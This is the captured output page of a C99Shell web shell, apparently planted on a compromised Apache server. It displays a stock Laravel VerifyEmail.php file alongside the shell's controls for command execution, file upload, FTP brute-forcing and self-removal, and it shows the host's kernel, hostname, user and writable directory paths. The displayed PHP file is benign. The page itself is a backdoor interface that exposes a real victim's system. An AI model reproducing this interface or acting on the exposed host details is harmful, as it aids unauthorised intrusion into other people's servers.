!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/dokan/script/vendor/laravel/framework/src/Illuminate/Auth/Notifications/   drwxrwxrwx
Free 13.1 GB of 57.97 GB (22.61%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     VerifyEmail.php (3.05 KB)      -rwxrwxrwx
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Illuminate\Auth\Notifications;

use 
Illuminate\Notifications\Messages\MailMessage;
use 
Illuminate\Notifications\Notification;
use 
Illuminate\Support\Carbon;
use 
Illuminate\Support\Facades\Config;
use 
Illuminate\Support\Facades\Lang;
use 
Illuminate\Support\Facades\URL;

class 
VerifyEmail extends Notification
{
    
/**
     * The callback that should be used to create the verify email URL.
     *
     * @var \Closure|null
     */
    
public static $createUrlCallback;

    
/**
     * The callback that should be used to build the mail message.
     *
     * @var \Closure|null
     */
    
public static $toMailCallback;

    
/**
     * Get the notification's channels.
     *
     * @param  mixed  $notifiable
     * @return array|string
     */
    
public function via($notifiable)
    {
        return [
'mail'];
    }

    
/**
     * Build the mail representation of the notification.
     *
     * @param  mixed  $notifiable
     * @return \Illuminate\Notifications\Messages\MailMessage
     */
    
public function toMail($notifiable)
    {
        
$verificationUrl $this->verificationUrl($notifiable);

        if (static::
$toMailCallback) {
            return 
call_user_func(static::$toMailCallback$notifiable$verificationUrl);
        }

        return 
$this->buildMailMessage($verificationUrl);
    }

    
/**
     * Get the verify email notification mail message for the given URL.
     *
     * @param  string  $url
     * @return \Illuminate\Notifications\Messages\MailMessage
     */
    
protected function buildMailMessage($url)
    {
        return (new 
MailMessage)
            ->
subject(Lang::get('Verify Email Address'))
            ->
line(Lang::get('Please click the button below to verify your email address.'))
            ->
action(Lang::get('Verify Email Address'), $url)
            ->
line(Lang::get('If you did not create an account, no further action is required.'));
    }

    
/**
     * Get the verification URL for the given notifiable.
     *
     * @param  mixed  $notifiable
     * @return string
     */
    
protected function verificationUrl($notifiable)
    {
        if (static::
$createUrlCallback) {
            return 
call_user_func(static::$createUrlCallback$notifiable);
        }

        return 
URL::temporarySignedRoute(
            
'verification.verify',
            
Carbon::now()->addMinutes(Config::get('auth.verification.expire'60)),
            [
                
'id' => $notifiable->getKey(),
                
'hash' => sha1($notifiable->getEmailForVerification()),
            ]
        );
    }

    
/**
     * Set a callback that should be used when creating the email verification URL.
     *
     * @param  \Closure  $callback
     * @return void
     */
    
public static function createUrlUsing($callback)
    {
        static::
$createUrlCallback $callback;
    }

    
/**
     * Set a callback that should be used when building the notification mail message.
     *
     * @param  \Closure  $callback
     * @return void
     */
    
public static function toMailUsing($callback)
    {
        static::
$toMailCallback $callback;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0058 ]--